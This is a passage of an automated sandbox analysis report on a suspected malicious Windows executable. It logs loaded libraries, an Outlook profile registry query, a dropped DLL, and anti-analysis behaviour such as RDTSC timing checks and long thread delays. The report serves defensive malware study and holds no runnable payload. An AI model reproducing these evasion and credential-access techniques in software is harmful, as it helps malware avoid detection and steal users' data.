            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Benchership141.lnk.0.drLNK file: ..\..\..\mindevrdigt\boghandlermedhjlperens.tor
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: 14lVOjBoI2.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2119760895.0000000002A1A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2643645497.00000000017DA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeFile created: C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeAPI/Special instruction interceptor: Address: 2CFA3CB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeAPI/Special instruction interceptor: Address: 1ABA3CB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeRDTSC instruction interceptor: First address: 2CBDDBA second address: 2CBDDBA instructions: 0x00000000 rdtsc 0x00000002 cld 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F08D07E15D9h 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeRDTSC instruction interceptor: First address: 1A7DDBA second address: 1A7DDBA instructions: 0x00000000 rdtsc 0x00000002 cld 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F08D12E5D89h 0x00000007 inc ebp 0x00000008 inc ebx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeMemory allocated: 36510000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeMemory allocated: 38510000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599253Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599001Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598883Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596992Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596889Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596657Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596507Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596283Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596162Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595795Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594735Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594625Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594516Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594406Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594172Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeWindow / User API: threadDelayed 7683Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeWindow / User API: threadDelayed 2140Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsr675C.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeAPI coverage: 4.4 %
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep count: 41 > 30Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -37815825351104557s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 5084Thread sleep count: 7683 > 30Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 5084Thread sleep count: 2140 > 30Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599253s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -599001s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598883s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -598063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597610s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597485s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597360s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -597110s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596992s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596657s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596507s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596283s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596162s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -596047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595907s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595795s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594735s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594172s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exe TID: 528Thread sleep time: -594063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405846
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_004027FB FindFirstFileW,5_2_004027FB
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeCode function: 5_2_00406398 FindFirstFileW,FindClose,5_2_00406398
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599253Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 599001Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598883Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598188Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 598063Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597953Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597844Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597719Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597235Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 597110Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596992Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596889Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596781Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596657Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596507Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596283Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596162Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 596047Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595907Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595795Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595672Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595563Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595438Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595313Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\14lVOjBoI2.exeThread delayed: delay time: 594969Jump to behavior
